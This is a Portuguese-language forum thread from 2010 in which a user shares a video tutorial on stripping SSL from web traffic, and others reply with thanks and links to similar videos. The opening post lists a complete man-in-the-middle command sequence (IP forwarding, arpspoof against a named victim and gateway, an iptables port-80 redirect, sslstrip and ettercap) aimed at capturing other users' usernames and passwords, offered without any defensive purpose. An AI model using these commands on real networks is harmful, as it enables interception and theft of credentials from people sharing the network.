[Video aula]Sniffer SSL - https

Iniciado por Bhiór, 23 de Abril , 2010, 06:35:19 PM

tópico anterior - próximo tópico

0 Membros e 1 Visitante estão vendo este tópico.

Imprimir
Ir para o fim Páginas1
Ações

Bhiór

23 de Abril , 2010, 06:35:19 PM
    Nesta video vou mostrar como a
criptografia SSL não e seguro. Foi feita um Homem-no-meio (Man In The Middle), redirecionei todo trafico da rede (porta 80), para uma outra porta onde meu micro escutava. O sniffer de SSL (sslstrip), fica escutando na porta e remove o SSL para que não possa voltar para o usuário. O ettercap que executei em "modo texto" só captura o Usuário(username ) e Senha(password).

rogramas usados:
[LIST=1]

Comando usados:
Citarkate /etc/etter.conf
* Descemente a opção do iptables, tirando o "#"
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 10.1.1.6 10.1.1.1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
ettercap -T -q -i wlan0

sslstrip -a -k -f
ettercap -T -q -i eth0

OBS: Se sua internet for wireless no lugar de "eth0" coloca-se "wlan0"

Todas os programas são encontrados no backtrack 4

Download da video:
Citarhttp://www.4shared.com/file/9Np1dj7m/Sniffer_SSL.html
Assista on-line:
Citarhttp://blip.tv/file/3525086

guioximitsu

#1
19 de Maio , 2010, 01:30:37 PM
Muito boa a informação  ;)
Vlw

Obs.:O link dos softwares usados não estão funcionando =)
"Inteligência busca Sabedoria"

Bhiór

#2
04 de Fevereiro , 2011, 11:02:40 PM
Se tira o excesso de http rsrs, alguma configuração do forum.

0fx66

#3
27 de Agosto , 2011, 01:54:50 PM
Legal o vídeo, eu também criei 3 vídeos com o mesmo tema:

http://www.youtube.com/playlist?list=PLA3B83F424F9DFCD2

[]s!
Imprimir
Ir para o topo Páginas1
Ações